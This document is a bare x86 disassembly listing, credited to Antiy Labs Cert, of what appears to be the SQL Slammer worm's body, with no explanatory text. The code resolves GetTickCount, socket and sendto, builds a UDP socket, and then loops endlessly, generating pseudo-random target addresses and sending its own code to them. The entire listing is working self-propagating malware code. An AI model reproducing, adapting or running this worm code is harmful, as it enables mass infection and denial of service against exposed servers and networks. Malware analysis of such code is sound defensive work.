by Antiy Labs Cert :00000000 68DCC9B042 push 42B0C9DC :00000005 B801010101 mov eax, 01010101 :0000000A 31C9 xor ecx, ecx :0000000C B118 mov cl, 18 :0000000E 50 push eax :0000000F E2FD loop 0000000E :00000011 3501010105 xor eax, 05010101 :00000016 50 push eax :00000017 89E5 mov ebp, esp :00000019 51 push ecx :0000001A 682E646C6C push 6C6C642E :0000001F 68656C3332 push 32336C65 :00000024 686B65726E push 6E72656B :00000029 51 push ecx :0000002A 686F756E74 push 746E756F :0000002F 6869636B43 push 436B6369 :00000034 6847657454 push 54746547 :00000039 66B96C6C mov cx, 6C6C :0000003D 51 push ecx :0000003E 6833322E64 push 642E3233 :00000043 687773325F push 5F327377 :00000048 66B96574 mov cx, 7465 :0000004C 51 push ecx :0000004D 68736F636B push 6B636F73 :00000052 66B9746F mov cx, 6F74 :00000056 51 push ecx :00000057 6873656E64 push 646E6573 :0000005C BE1810AE42 mov esi, 42AE1018 :00000061 8D45D4 lea eax, dword ptr [ebp-2C] :00000064 50 push eax :00000065 FF16 call dword ptr [esi] :00000067 50 push eax :00000068 8D45E0 lea eax, dword ptr [ebp-20] :0000006B 50 push eax :0000006C 8D45F0 lea eax, dword ptr [ebp-10] :0000006F 50 push eax :00000070 FF16 call dword ptr [esi] :00000072 50 push eax :00000073 BE1010AE42 mov esi, 42AE1010 :00000078 8B1E mov ebx, dword ptr [esi] :0000007A 8B03 mov eax, dword ptr [ebx] :0000007C 3D558BEC51 cmp eax, 51EC8B55 :00000081 7405 je 00000088 :00000083 BE1C10AE42 mov esi, 42AE101C :00000088 FF16 call dword ptr [esi] :0000008A FFD0 call eax :0000008C 31C9 xor ecx, ecx :0000008E 51 push ecx :0000008F 51 push ecx :00000090 50 push eax :00000091 81F10301049B xor ecx, 9B040103 :00000097 81F101010101 xor ecx, 01010101 :0000009D 51 push ecx :0000009E 8D45CC lea eax, dword ptr [ebp-34] :000000A1 50 push eax :000000A2 8B45C0 mov eax, dword ptr [ebp-40] :000000A5 50 push eax :000000A6 FF16 call dword ptr [esi] :000000A8 6A11 push 00000011 :000000AA 6A02 push 00000002 :000000AC 6A02 push 00000002 :000000AE FFD0 call eax :000000B0 50 push eax :000000B1 8D45C4 lea eax, dword ptr [ebp-3C] :000000B4 50 push eax :000000B5 8B45C0 mov eax, dword ptr [ebp-40] :000000B8 50 push eax :000000B9 FF16 call dword ptr [esi] :000000BB 89C6 mov esi, eax :000000BD 09DB or ebx, ebx :000000BF 81F33C61D9FF xor ebx, FFD9613C :000000C5 8B45B4 mov eax, dword ptr [ebp-4C] :000000C8 8D0C40 lea ecx, dword ptr [eax+2*eax] :000000CB 8D1488 lea edx, dword ptr [eax+4*ecx] :000000CE C1E204 shl edx, 04 :000000D1 01C2 add edx, eax :000000D3 C1E208 shl edx, 08 :000000D6 29C2 sub edx, eax :000000D8 8D0490 lea eax, dword ptr [eax+4*edx] :000000DB 01D8 add eax, ebx :000000DD 8945B4 mov dword ptr [ebp-4C], eax :000000E0 6A10 push 00000010 :000000E2 8D45B0 lea eax, dword ptr [ebp-50] :000000E5 50 push eax :000000E6 31C9 xor ecx, ecx :000000E8 51 push ecx :000000E9 6681F17801 xor cx, 0178 :000000EE 51 push ecx :000000EF 8D4503 lea eax, dword ptr [ebp+03] :000000F2 50 push eax :000000F3 8B45AC mov eax, dword ptr [ebp-54] :000000F6 50 push eax :000000F7 FFD6 call esi :000000F9 EBCA jmp 000000C5